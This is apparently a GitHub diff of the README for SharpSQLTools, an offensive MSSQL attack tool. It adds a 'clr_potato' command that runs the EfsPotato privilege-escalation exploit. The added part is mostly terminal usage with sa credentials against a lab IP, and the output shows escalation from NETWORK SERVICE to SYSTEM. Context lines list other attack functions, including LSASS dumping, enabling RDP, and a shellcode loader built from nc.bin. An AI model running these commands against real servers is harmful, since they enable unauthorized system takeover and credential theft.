|
6 | 6 |
|
7 | 7 | ### 更新日志 |
8 | 8 |
|
| 9 | +- 2021-08-03 |
| 10 | + - 添加clr_potato |
| 11 | + 致谢[zcgonvh@EfsPotato](https://github.com/zcgonvh/EfsPotato) & [hl0rey](https://github.com/hl0rey) |
| 12 | + |
9 | 13 | - 2021-07-10 |
10 | 14 | - 修复上传bug |
11 | 15 | - 修复clr回显bug |
@@ -57,6 +61,7 @@ disable_clr - you know what it means |
57 | 61 | install_clr - create assembly and procedure |
58 | 62 | uninstall_clr - drop clr |
59 | 63 | clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami |
| 64 | +clr_potato {cmd} - exec by EfsPotato like clr_exec |
60 | 65 | clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files |
61 | 66 | clr_dumplsass {path} - dumplsass by clr |
62 | 67 | clr_rdp - check RDP port and Enable RDP |
@@ -131,6 +136,52 @@ nt service\mssql$sqlexpress |
131 | 136 |
|
132 | 137 | ``` |
133 | 138 |
|
| 139 | +#### clr_potato |
| 140 | + |
| 141 | +``` |
| 142 | +λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato whoami |
| 143 | +[*] Database connection is successful! |
| 144 | +Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). |
| 145 | +Part of GMH's fuck Tools, Code By zcgonvh. |
| 146 | +
|
| 147 | +[+] Current user: NT AUTHORITY\NETWORK SERVICE |
| 148 | +[+] Get Token: 3352 |
| 149 | +[+] Command : c:\Windows\System32\cmd.exe /c whoami |
| 150 | +[!] process with pid: 2012 created. |
| 151 | +============================== |
| 152 | +
|
| 153 | +
|
| 154 | +nt authority\system |
| 155 | +
|
| 156 | +λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato -p c:\windows/system32\whoami.exe |
| 157 | +[*] Database connection is successful! |
| 158 | +Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). |
| 159 | +Part of GMH's fuck Tools, Code By zcgonvh. |
| 160 | +
|
| 161 | +[+] Current user: NT AUTHORITY\NETWORK SERVICE |
| 162 | +[+] Get Token: 3084 |
| 163 | +[+] Command : c:\windows/system32\whoami.exe |
| 164 | +[!] process with pid: 164 created. |
| 165 | +============================== |
| 166 | +
|
| 167 | +
|
| 168 | +nt authority\system |
| 169 | +
|
| 170 | +λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_potato -p c:\cmd.exe -a /c whoami |
| 171 | +[*] Database connection is successful! |
| 172 | +Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability). |
| 173 | +Part of GMH's fuck Tools, Code By zcgonvh. |
| 174 | +
|
| 175 | +[+] Current user: NT AUTHORITY\NETWORK SERVICE |
| 176 | +[+] Get Token: 3124 |
| 177 | +[+] Command : c:\cmd.exe /c whoami |
| 178 | +[!] process with pid: 2080 created. |
| 179 | +============================== |
| 180 | +
|
| 181 | +
|
| 182 | +nt authority\system |
| 183 | +``` |
| 184 | + |
134 | 185 | #### clr_scloader |
135 | 186 | ``` |
136 | 187 | λ python Encrypt.py -f nc.bin -k 1234 |
@@ -289,3 +340,5 @@ https://github.com/An0nySec/ShadowUser/blob/main/ShadowUser/Program.cs#L235 |
289 | 340 | https://github.com/GhostPack/SharpDump |
290 | 341 |
|
291 | 342 | https://gist.github.com/jfmaes/944991c40fb34625cf72fd33df1682c0 |
| 343 | + |
| 344 | +https://github.com/zcgonvh/EfsPotato |
0 commit comments